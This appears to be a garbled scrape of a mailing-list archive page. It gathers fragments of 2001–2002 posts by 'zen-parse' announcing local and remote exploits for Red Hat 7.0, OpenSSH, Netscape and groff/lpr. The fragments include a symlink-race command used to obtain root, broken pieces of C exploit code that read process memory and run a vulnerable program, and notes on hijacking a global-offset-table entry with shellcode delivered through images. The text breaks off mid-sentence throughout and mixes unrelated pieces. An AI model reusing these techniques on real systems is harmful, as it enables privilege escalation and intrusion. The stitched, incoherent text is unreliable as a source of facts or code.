zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory
--zen-parse
Sorry, I forgot some relevant information.
With regards to previous post:
Tested on:-
Red Hat Linux release 7.0 (Guinness)
[zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
openssh-server-2.5.2p2-1.7.2
[zen-parse@clarity zen-parse]$ ssh -V
OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL
then we have a buffer
overflow.
With the ftp service I was only able to get a 1022 byte buffer written
but with other services
with longer names that use authentication, this could be a serious
problem.
The server is still running as root while this happens.
--zen-parse
by user invoking man)
==
--zen-parse
Mon Jun 4 23:17:50 NZST 2001
** Most of the exploit tweaking involves details covered here, or the set
up of programs for the exploits to work with.
, I hope.
Could possibly be useful with the (still unpatched)
makewhatis.cron bug.
-- zen-parse
/***
#define SAFER [1000]
/***/
int shake(int script kiddy
/%d/mem,p);
close(0);
f=fopen(y,r);
fseek(f,WHERETOREAD,SEEK_SET);
execl(/tmp/vuln-prog,scary,/tmp/myscript,0);
}
EOF
-- zen-parse
//tstot.c
/
zen-parse presents
tstot.c - remote portbinding exploit for
RedHat 7.0
Netscape 4.77
fopen() call to popen() and executes code from
~/.nofinger
Read the comments.
-- zen-parse
M4D PR0PZ T0 :
Steven for showing me da bugz
noid 4 b3in6 7h3r3 wh3n no1 3153 w4z
grue 4 lurking, g00bER 4 something
and the rest of #roothat
\n);
tmp=eos(retstr);
sprintf(tmp,of groff.\n);
tmp=eos(retstr);
return retstr;
}
end pic-lpr-remote.c
-- - - - - - -- http://mp3.com/cosv - It's not just a music site! --
-- zen-parse -- (photon bed
for?) an advisory from Netscape at some point soon for this
and the other patched issues.
-- zen-parse
--
-
1) If this message was posted to a public forum by [EMAIL PROTECTED], it
may be redistributed without modification.
2
pointer for PR_Free in the global offset table of libsnpr4.so.
Shellcode can be supplied in a previously loaded image. (A large area
can be filled using compressed image files stored in a .jar as the source.)
==
-- zen-parse
to Javascript.
July 13
===
Microsoft closes off on JS bug. Patch becomes available eventually, as
threat was not seen as high by Microsoft.
+++
Netscape informed of second PNG bug/exploit method.
== Sent ==
Date: Sat, 13 Jul 2002 04:04:56 +1200 (NZST)
From: zen-parse [EMAIL PROTECTED
is insecure, so how about
Open Source software is as secure as Closed Source.
Many eyes would make code more secure, but only if they are actually
looking at the code.
But that does not happen.
-- zen-parse
--
-
1
13 matches
Mail list logo